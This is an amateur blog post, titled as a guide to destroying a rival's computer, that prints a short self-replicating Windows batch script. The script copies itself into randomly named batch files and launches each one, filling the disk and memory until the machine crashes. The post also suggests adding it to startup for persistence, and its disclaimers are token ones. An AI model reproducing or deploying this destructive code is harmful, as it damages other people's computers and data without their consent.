How to Destroy your Rivals Computer using a Batch File

I just created the following batch file and ran it on myself and am SUPER glad i shut my computer off, because this batch file creates another batch file at random numbers, then puts the same code of itself in each of those files, then runs those bats, which ALSO do the same thing, constantly, forever, until your stop it.

what this will do, if you leave it on long enough, is it will store itself in ALOT of your hard drive space, making it almost ZERO, then also use up all your ram as your computer goes through all the files, and crash your pc. this virus WILL REQUIRE YOU TO REINSTALL WINDOWS!!!! to get rid of it!!!!

now, if you really wanted to make it a bad batch file, you could have it copy itself to startup, so that when you start up, the horror starts all over again, ON TOP OF ITSELF!!!!.



let me tell you, i let it run only five seconds, and that's b/c it took almost five seconds for the shutdown, and i deleted almost 9 megabytes of diskspace used by just BATCH FILES (which are 1 kb a PIECE!!) just imagine what would have happened to me if i let it run for just one minute...it'd be GIGS and probably well past GIGS in 10 minutes.

so, be careful guys, don't run it on yourself unless you have a virtual machine to limit your disk space used (even that might not be safe).

my usual warning, DON'T DO ANYTHING STUPID! DON'T DO ANYTHING ILLEGAL WITH THIS!




@echo off
:A
SET /A X=%RANDOM%%%1999999999%
type damage.bat >> %x%.bat
start %x%.bat
goto:A

 i am not responsible for anyone who decide to run this code.
 

Unknown

Some say he’s half man half fish, others say he’s more of a seventy/thirty split. Either way he’s a fishy bastard.

0 comments: